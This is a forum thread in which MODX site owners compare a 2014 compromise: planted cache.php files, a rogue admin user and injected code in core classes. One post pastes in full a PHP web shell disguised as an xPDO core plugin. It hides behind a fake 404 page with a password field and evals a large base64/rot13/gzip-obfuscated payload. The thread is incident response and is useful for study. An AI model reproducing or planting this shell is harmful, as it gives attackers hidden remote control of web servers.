We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 38357
    • 178 Posts
    I have cleared core/cache completely and denied access to any re-occurrence of cache.php using .htaccess So far there has been no reinfection since the last one. I have no unknown users. I am continuing to monitor the site to see if reinfection occurs.
    It is of interest that frankliveaux had this file in assets - mine was in public_html
    If this is a zero-day exploit then it may go a long way further back than 2.2.14 ? [ed. note: bobd72 last edited this post 10 years ago.]
      • 23018
      • 353 Posts
      Quote from: bobd72 at Jun 26, 2014, 01:14 PM
      I have cleared core/cache completely and denied access to any re-occurrence of cache.php using .htaccess So far there has been no reinfection since the last one. I have no unknown users. I am continuing to monitor the site to see if reinfection occurs.
      It is of interest that frankliveaux had this file in assets - mine was in public_html
      If this is a zero-day exploit then it may go a long way further back than 2.2.14 ?

      I'm not an htaccess expert. Mind sharing your rule to deny access to cache.php?

      How about redirecting requests to */cache.php instead of denying it? Could be used to send you a wakeup call.

      Regards,

      pepebe
        Homepage: pepebe.de | MODX snippets (and other stuff) at github: https://gist.github.com/pepebe
      • Is it possible for anyone who has clear evidence of a hack to submit their access logs and any removed files (obviously if you didn't just delete them) to security [at] modx [dot] com.

        I am seeing reports of issues on new installs and while we understand the urgency of getting your site back on line if there's a live exploit in the wild, we should try to close it ASAP.

          Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub
          • 10075
          • 20 Posts
          I don't still have the server access logs, but I've sent a copy of the modified modresponse.class.php and the hostile cache.php files to the security address.
            • 28690
            • 25 Posts
            I've discovered it on a 2.2.6 site with these symptoms already mentioned previously by others:

            • support@ user created
            • the $linker=base64 code embedded in modx-modresponse.class.php
            • cache.php file injected into the /assets folder

            I also found these:

            • /assets/cache.idx.php
            • /assets/xPDO.idx.php
            • /core/cache/xPDO.idx.php

            All three contained this code:
            <?php
            /*
             * OpenExpedio ("xPDO") is an ultra-light, PHP 5.2+ compatible ORB (Object-
             * Relational Bridge) library based around PDO (http://php.net/pdo/).
             *
             *
             * This plugin is part of xPDO.
             *
             * xPDO is free software; you can redistribute it and/or modify it under the
             * terms of the GNU General Public License as published by the Free Software
             * Foundation; either version 2 of the License, or (at your option) any later
             * version.
             *
             * xPDO is distributed in the hope that it will be useful, but WITHOUT ANY
             * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
             * A PARTICULAR PURPOSE. See the GNU General Public License for more details.
             *
             * xPDO is used by MODx Core. Dont remove any core plugins
             */
            
            
            
            
            
            function mod_xpdo_error () {
            		die("<h1>Not Found</h1>
            		<p>The requested URL was not found on this server.</p>
            		<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
            		<hr>
            		<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4  Server at Port 80</address>														<style>				input { margin:0;background-color:#fff;border:1px solid #fff; }			</style>			<pre align=center>			<form method=post>			<input type=password name=pass>			</form></pre>															");																}
            	
            $mhash = "02f052306dd0c2605e701b4cf0859f3a";
            $auth_pass = md5($mhash."-check");
            															@eval( gzuncompress( str_rot13( base64_decode  ("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